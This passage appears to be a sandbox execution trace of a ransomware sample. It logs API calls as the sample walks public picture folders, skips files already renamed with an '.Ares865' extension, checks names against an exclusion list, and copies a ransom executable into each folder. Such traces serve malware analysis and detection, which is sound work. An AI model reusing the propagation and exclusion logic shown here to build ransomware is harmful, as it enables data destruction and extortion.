lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0057.386] CloseHandle (hObject=0x118) returned 1 [0057.386] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0057.386] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.386] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4b96a420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4b96a420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0057.386] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.386] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.386] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.386] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4b96a420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4b96a420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.386] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.386] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0057.386] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.386] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.386] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0057.386] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.386] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0057.386] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0057.386] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0057.386] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0057.386] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0057.387] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0057.387] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0057.387] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0057.387] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0057.387] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0057.387] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0057.387] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0057.387] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0057.387] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\*") returned 39 [0057.387] lstrcpyW (in: lpString1=0x2cce44c, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0057.387] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0057.387] lstrlenW (lpString="Ares865") returned 7 [0057.387] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.387] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x496c03c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x496c03c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0057.387] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0057.387] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0057.387] lstrcmpiW (lpString1="Sample Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.387] lstrcmpiW (lpString1="Sample Pictures", lpString2="aoldtz.exe") returned 1 [0057.387] lstrcmpiW (lpString1="Sample Pictures", lpString2=".") returned 1 [0057.387] lstrcmpiW (lpString1="Sample Pictures", lpString2="..") returned 1 [0057.387] lstrcmpiW (lpString1="Sample Pictures", lpString2="windows") returned -1 [0057.387] lstrcmpiW (lpString1="Sample Pictures", lpString2="bootmgr") returned 1 [0057.387] lstrcmpiW (lpString1="Sample Pictures", lpString2="temp") returned -1 [0057.387] lstrcmpiW (lpString1="Sample Pictures", lpString2="pagefile.sys") returned 1 [0057.387] lstrcmpiW (lpString1="Sample Pictures", lpString2="boot") returned 1 [0057.387] lstrcmpiW (lpString1="Sample Pictures", lpString2="ids.txt") returned 1 [0057.387] lstrcmpiW (lpString1="Sample Pictures", lpString2="ntuser.dat") returned 1 [0057.387] lstrcmpiW (lpString1="Sample Pictures", lpString2="perflogs") returned 1 [0057.387] lstrcmpiW (lpString1="Sample Pictures", lpString2="MSBuild") returned 1 [0057.387] lstrlenW (lpString="Sample Pictures") returned 15 [0057.387] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\desktop.ini.Ares865") returned 57 [0057.387] lstrcpyW (in: lpString1=0x2cce44c, lpString2="Sample Pictures" | out: lpString1="Sample Pictures") returned="Sample Pictures" [0057.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0057.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2d2ef0 [0057.387] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7bf0 [0057.388] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0057.388] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0057.388] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0057.388] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures" [0057.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0057.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0057.388] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures") returned 53 [0057.388] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures" [0057.388] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.388] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\documents\\my pictures\\sample pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0057.388] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0057.388] GetLastError () returned 0x0 [0057.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0057.388] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0057.389] CloseHandle (hObject=0x118) returned 1 [0057.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0057.389] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.389] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0057.389] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.389] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.389] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.389] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.389] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.389] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0057.389] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.389] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.389] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4bb0d340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xd6e30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Chrysanthemum.jpg.Ares865", cAlternateFileName="CHRYSA~1.ARE")) returned 1 [0057.389] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.389] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0057.389] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2=".") returned 1 [0057.389] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="..") returned 1 [0057.389] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="windows") returned -1 [0057.389] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="bootmgr") returned 1 [0057.389] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="temp") returned -1 [0057.389] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="pagefile.sys") returned -1 [0057.389] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="boot") returned 1 [0057.389] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="ids.txt") returned -1 [0057.389] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="ntuser.dat") returned -1 [0057.389] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="perflogs") returned -1 [0057.389] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="MSBuild") returned -1 [0057.389] lstrlenW (lpString="Chrysanthemum.jpg.Ares865") returned 25 [0057.389] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\*") returned 55 [0057.389] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Chrysanthemum.jpg.Ares865" | out: lpString1="Chrysanthemum.jpg.Ares865") returned="Chrysanthemum.jpg.Ares865" [0057.390] lstrlenW (lpString="Chrysanthemum.jpg.Ares865") returned 25 [0057.390] lstrlenW (lpString="Ares865") returned 7 [0057.390] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.390] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4bd22680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xceb80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desert.jpg.Ares865", cAlternateFileName="")) returned 1 [0057.390] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.390] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0057.390] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2=".") returned 1 [0057.390] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="..") returned 1 [0057.390] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="windows") returned -1 [0057.390] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="bootmgr") returned 1 [0057.390] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="temp") returned -1 [0057.390] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="pagefile.sys") returned -1 [0057.390] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="boot") returned 1 [0057.390] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="ids.txt") returned -1 [0057.390] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="ntuser.dat") returned -1 [0057.390] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="perflogs") returned -1 [0057.390] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="MSBuild") returned -1 [0057.390] lstrlenW (lpString="Desert.jpg.Ares865") returned 18 [0057.390] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\Chrysanthemum.jpg.Ares865") returned 79 [0057.390] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Desert.jpg.Ares865" | out: lpString1="Desert.jpg.Ares865") returned="Desert.jpg.Ares865" [0057.390] lstrlenW (lpString="Desert.jpg.Ares865") returned 18 [0057.390] lstrlenW (lpString="Ares865") returned 7 [0057.390] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.390] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4c492b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0057.390] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.390] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0057.390] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0057.390] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0057.390] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0057.390] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0057.390] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0057.390] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0057.390] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0057.390] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0057.391] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0057.391] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0057.391] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0057.391] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0057.391] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\Desert.jpg.Ares865") returned 72 [0057.391] lstrcpyW (in: lpString1=0x2cce46c, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0057.391] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0057.391] lstrlenW (lpString="Ares865") returned 7 [0057.391] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.391] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4970c680, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4970c680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0057.391] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0057.391] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x91860, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hydrangeas.jpg.Ares865", cAlternateFileName="HYDRAN~1.ARE")) returned 1 [0057.391] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.391] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0057.391] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2=".") returned 1 [0057.391] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="..") returned 1 [0057.391] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="windows") returned -1 [0057.391] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="bootmgr") returned 1 [0057.391] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="temp") returned -1 [0057.391] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="pagefile.sys") returned -1 [0057.391] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="boot") returned 1 [0057.391] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="ids.txt") returned -1 [0057.391] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="ntuser.dat") returned -1 [0057.391] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="perflogs") returned -1 [0057.391] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="MSBuild") returned -1 [0057.391] lstrlenW (lpString="Hydrangeas.jpg.Ares865") returned 22 [0057.391] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\desktop.ini.Ares865") returned 73 [0057.391] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Hydrangeas.jpg.Ares865" | out: lpString1="Hydrangeas.jpg.Ares865") returned="Hydrangeas.jpg.Ares865" [0057.391] lstrlenW (lpString="Hydrangeas.jpg.Ares865") returned 22 [0057.391] lstrlenW (lpString="Ares865") returned 7 [0057.391] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.391] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xbd920, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Jellyfish.jpg.Ares865", cAlternateFileName="JELLYF~1.ARE")) returned 1 [0057.391] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.391] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0057.391] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2=".") returned 1 [0057.391] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="..") returned 1 [0057.391] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="windows") returned -1 [0057.392] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="bootmgr") returned 1 [0057.392] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="temp") returned -1 [0057.392] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="pagefile.sys") returned -1 [0057.392] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="boot") returned 1 [0057.392] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="ids.txt") returned 1 [0057.392] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="ntuser.dat") returned -1 [0057.392] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="perflogs") returned -1 [0057.392] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="MSBuild") returned -1 [0057.392] lstrlenW (lpString="Jellyfish.jpg.Ares865") returned 21 [0057.392] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\Hydrangeas.jpg.Ares865") returned 76 [0057.392] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Jellyfish.jpg.Ares865" | out: lpString1="Jellyfish.jpg.Ares865") returned="Jellyfish.jpg.Ares865" [0057.392] lstrlenW (lpString="Jellyfish.jpg.Ares865") returned 21 [0057.392] lstrlenW (lpString="Ares865") returned 7 [0057.392] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.392] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4d02d680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xbed20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Koala.jpg.Ares865", cAlternateFileName="")) returned 1 [0057.392] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.392] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0057.392] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2=".") returned 1 [0057.392] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="..") returned 1 [0057.392] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="windows") returned -1 [0057.392] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="bootmgr") returned 1 [0057.392] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="temp") returned -1 [0057.392] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="pagefile.sys") returned -1 [0057.392] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="boot") returned 1 [0057.392] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="ids.txt") returned 1 [0057.392] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="ntuser.dat") returned -1 [0057.392] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="perflogs") returned -1 [0057.392] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="MSBuild") returned -1 [0057.392] lstrlenW (lpString="Koala.jpg.Ares865") returned 17 [0057.392] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\Jellyfish.jpg.Ares865") returned 75 [0057.392] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Koala.jpg.Ares865" | out: lpString1="Koala.jpg.Ares865") returned="Koala.jpg.Ares865" [0057.392] lstrlenW (lpString="Koala.jpg.Ares865") returned 17 [0057.392] lstrlenW (lpString="Ares865") returned 7 [0057.392] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.392] FindNextFileW (in: 